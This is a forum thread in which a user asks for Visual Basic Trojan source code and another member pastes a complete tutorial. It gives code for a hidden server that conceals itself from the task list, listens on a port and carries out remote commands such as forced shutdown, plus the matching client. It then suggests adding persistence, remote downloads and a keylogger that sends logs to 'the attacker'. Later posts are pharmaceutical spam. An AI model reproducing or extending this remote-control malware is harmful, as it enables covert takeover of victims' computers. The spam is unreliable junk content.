Page 1 of 2 12 LastLast
    Thanks

Trojan - Doing my nut in!

Im following 2 tutorials on how to build a Trojan in Visual Basic and its pissing me off as it wont work! I can normally get things like this to work but this is just pissing me off! so if anyone has a pre-made source i can edit or another tutorial and how to add commands to it please tell me here or add me on msn and tell me show me SOMETHING!!

Thanks Condor01

condor01@kownage.com

Thanks
    My Mood
    Sad
    Why do you wan't to make a trojan? Its simple socket programming..

There are two types of tragedies in life. One is not getting what you want, the other is getting it.

If you wake up at a different time in a different place, could you wake up as a different person?

Thanks
    My Mood
    Bitchy
    A trojan? Fuck that.. make a RAT!

Thanks
    Because im using it to learn from and to make a RAT i need to have a trojan to open and listen in the ports.

Thanks
    My Mood
    Sad
    Okay...Well you are aware the firewall can block this. In Vista the applications are not alloud to disable or tamper with the firewall..As well as the new Windows updates..

There are two types of tragedies in life. One is not getting what you want, the other is getting it.

If you wake up at a different time in a different place, could you wake up as a different person?

Thanks
    Why you want make vb6 prog. Plus trojan? =o Make .bat virus and convert it to .exe x)

Thanks
    A trojan in vb is easy

Thanks
    Maybe, but DO NOT RELEASE IT!!! Then all hacks in here have a trojan.

But how the keylogger what send it in internet with ftp..:O

Thanks
    My Mood
    Bitchy
    Quote Originally Posted by condor01 View Post
    Because im using it to learn from and to make a RAT i need to have a trojan to open and listen in the ports.
    Hmm i see, well make a backdoor?

Thanks
    look all i fucking want is a fucking source to a trojan in VB no fucking .bats nothing just VB ok

Thanks
    My Mood
    Bitchy
    A tutorial to make a little trojan with a server and a client.

Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code.
    The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go
    through what you need for both and some sample code.

Server

The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it.
    To do this you start by using

Code:

Private Sub Form_Load() Me.Visible = False End Sub

This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier.
    So to get our application hidden from that a little better we make our code look like this.

Code:

Private Sub Form_Load() Me.Visible = False App.TaskVisible = False End Sub

(Due to Bill gates, all running exe's will be displayed in the list of running processes. Your app will be hidden in the Running Applications List though )

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this
    tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
    The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control.
    I named my control win but you can name yours what ever.
    Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.

Code:

Private Sub Form_Load() Me.Visible = False App.TaskVisible = False win.LocalPort = 2999 win.RemotePort = 455 win.Listen End Sub

This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat.

Then we add this code to our main form:

Code:

Private Sub win_ConnectionRequest(ByVal requestID As Long) win.Close win.Accept requestID End Sub Private Sub win_DataArrival(ByVal bytesTotal As Long) win.GetData GotDat DoActions (GotDat) End Sub

We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. (Public so it can be used by code outside of the Module) So add this code to the module and we are about done with the server
    of the Trojan!

[/code]
    Public Function DoActions(x As String)

Select Case x
    Case "msgbox"
    Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
    shell "shutdown -s -f -t 00"
    End Select
    End Function
    [/code]

Ok now we have a program that when the data “Msgbox” is sent to it on port 2999 it will display a msgbox on the victims computer. When the data "shutdown" is sent to it on port 2999 it will shutdown the computer. I used a Select Case statement so it is easy to modify this code to your own needs later on.

Congradulations! You just made your first Trojan. Lets go over the complete code now.

Main Form

Code:

Private Sub Form_Load() Me.Visible = False App.TaskVisible = False win.LocalPort = 2999 win.RemotePort = 455 win.Listen End Sub Pivate Sub win_ConnectionRequest(ByVal requestID As Long) win.Close win.Accept requestID End Sub Private Sub win_DataArrival(ByVal bytesTotal As Long) win.GetData GotDat DoActions (GotDat) End Sub

Remember to add your winsock control and name it to win if you use this code.

Module

Code:

Public Function DoActions(x As String) Select Case x Case "msgbox" Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error" Case "shutdown" shell "shutdown -s -f -t 00" End Select End Function

That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server
    that accepts the command of “shutdown” and "msgbox" lets make a client that sends the command “shutdown” and "msgbox".

Make a form and add a Winsock Control, a text box, and 4 buttons. The Text box should be named txtIP if you want it to work with this code.
    In addition, your buttons should be named cmdConnect, cmdMsgbox, cmdShutdown, and cmdDisconnect. Now lets look at the code we would use to make our
    Client.

Code:

Private Sub cmdConnect_Click() IpAddy = txtIp.Text Win.Close Win.RemotePort = 2999 Win.RemoteHost = IpAddy Win.LocalPort = 9999 Win.Connect cmdConnect.Enabled = False End Sub Private Sub cmdDisconnect_Click() Win.Close cmdConnect.Enabled = True End Sub Private Sub cmdMsgbox_Click() Win.SendData "msgbox" End Sub Private Sub cmdShutdown_Click() Win.SendData "shutdown" End Sub

That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send
    the “shutdown” or "msgbox" data to the server and the respective actions will be carried out (shutdown computer or display a msgbox)

These two programs do very little but can quickly evolve into a powerful remote administration tool if you know what you are doing. I suggest trying
    to add different types of error handeling and functions to both the server and client.

Ideas:

Make the server able to download a file specified by the attacker

Add code to make the Server be executed at startup. (Its a registry key)

Add a keylogger to the server - make it send the log to the attacker. There are loads more things you could do, just use your imagination.

from datastronghold.com
    There.........

Thanks

Post Excellent pages

Everybody. I hope to introduce you to my website: ashley funiture, gay marrage, cheep tickets, souviners, toyoto cars, hintai download, buy zantax, ametuers video, buy vaporizor, vaporizor and rebok
    Thank you very much for your attention

Thanks
    My Mood
    Tired
    A) Stop spamming
    B) Your necroing
    C) GTFO MPGH AND YOUR SHITTY SITE
    Current
    [IMG]https://i293.photobucke*****m/albums/mm63/Kaylafay99/CristanoRonaldo.png[/IMG]

Respect list
    iverson954360
    DAVE983192849182
    Jetamay

x.navi.x
    Hyperion
    Gourav2122
    Hispai
    TheEnigma
    Paroxysm
    ace76543

Thanks

Post Best regards. Lucky you

We have a good drugstore sites. Now the really discount tabs: cheap viagara, generic cealis, generic lavitra and other free lavitra, tramodol online, order tramodol, cealis, cheap diazepan, vicoden online, vicoden effects, levetra.
    And new cars: new ferari, hyunda car and modern kassino.

Thanks
    My Mood
    Inspired
    Are you fucking jokeing me.... dude common posting erectile medication.... to like 15 year olds... your sad. great way to advertise....

Page 1 of 2 12 LastLast